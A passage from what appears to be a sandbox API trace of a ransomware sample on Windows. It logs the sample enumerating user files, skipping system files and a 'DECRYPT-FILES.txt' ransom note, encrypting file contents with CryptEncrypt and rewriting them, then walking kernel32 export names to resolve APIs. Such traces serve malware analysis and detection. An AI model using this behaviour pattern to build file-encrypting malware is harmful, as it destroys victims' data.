"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms.ptar9ra"), dwFlags=0x0) returned 1 [0080.283] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.283] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.283] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.283] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a388960, ftCreationTime.dwHighDateTime=0x1d42023, ftLastAccessTime.dwLowDateTime=0xce5f0760, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xce5f0760, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x1f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="d93f411851d7c929.customDestinations-ms", cAlternateFileName="D93F41~1.CUS")) returned 1 [0080.283] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="DECRYPT-FILES.txt") returned -1 [0080.283] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="autorun.inf") returned 1 [0080.284] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="boot.ini") returned 1 [0080.284] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="desktop.ini") returned -1 [0080.284] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="ntuser.dat") returned -1 [0080.284] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="iconcache.db") returned -1 [0080.284] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="bootsect.bak") returned 1 [0080.284] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="ntuser.dat.log") returned -1 [0080.284] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="thumbs.db") returned -1 [0080.284] lstrcmpiW (lpString1="d93f411851d7c929.customDestinations-ms", lpString2="Bootfont.bin") returned 1 [0080.284] lstrlenW (lpString="d93f411851d7c929.customDestinations-ms") returned 38 [0080.284] lstrcmpiW (lpString1="customDestinations-ms", lpString2="lnk") returned -1 [0080.284] lstrcmpiW (lpString1="customDestinations-ms", lpString2="exe") returned -1 [0080.284] lstrcmpiW (lpString1="customDestinations-ms", lpString2="sys") returned -1 [0080.284] lstrcmpiW (lpString1="customDestinations-ms", lpString2="dll") returned -1 [0080.284] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0080.284] lstrlenW (lpString="d93f411851d7c929.customDestinations-ms") returned 38 [0080.284] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0080.284] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="d93f411851d7c929.customDestinations-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms" [0080.284] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.285] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=8040) returned 1 [0080.285] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.286] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.286] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.286] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.286] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.288] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.288] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.288] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.289] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.289] CloseHandle (hObject=0x464) returned 1 [0080.289] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.289] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.290] CloseHandle (hObject=0x0) returned 0 [0080.290] CloseHandle (hObject=0x460) returned 1 [0080.291] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.291] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.291] GetTickCount () returned 0x114c8fa [0080.291] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.291] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.291] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.292] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.292] lstrlenA (lpString="kernel32.dll") returned 12 [0080.292] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.292] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.292] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.292] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.292] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.292] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.292] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.292] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.292] lstrlenA (lpString="ADDATOMA") returned 8 [0080.292] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.292] lstrlenA (lpString="ADDATOMW") returned 8 [0080.292] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.292] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.292] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.292] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.292] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.293] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.293] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.293] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.293] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.293] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.293] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.293] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.293] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.293] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.293] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.293] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.293] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.293] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.293] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.293] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.293] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.293] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.293] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.294] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.294] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.294] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.294] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.294] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.294] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.294] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.294] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.294] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.294] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.294] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.294] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.294] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.294] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.294] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.294] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.294] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.294] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.294] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.295] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.295] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.295] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.295] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.295] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.295] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.295] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.295] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.295] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.295] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.295] lstrlenA (lpString="BEEP") returned 4 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.295] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.295] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.295] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.295] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.295] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.295] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.295] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.296] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.296] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.296] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.296] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.296] lstrlenA (lpString="CANCELIO") returned 8 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.296] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.296] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.296] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.296] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.296] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.296] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.296] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.296] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.296] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.296] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.296] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.296] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.296] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.296] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.296] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.297] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.297] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.297] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.297] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.297] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.297] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.297] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.297] 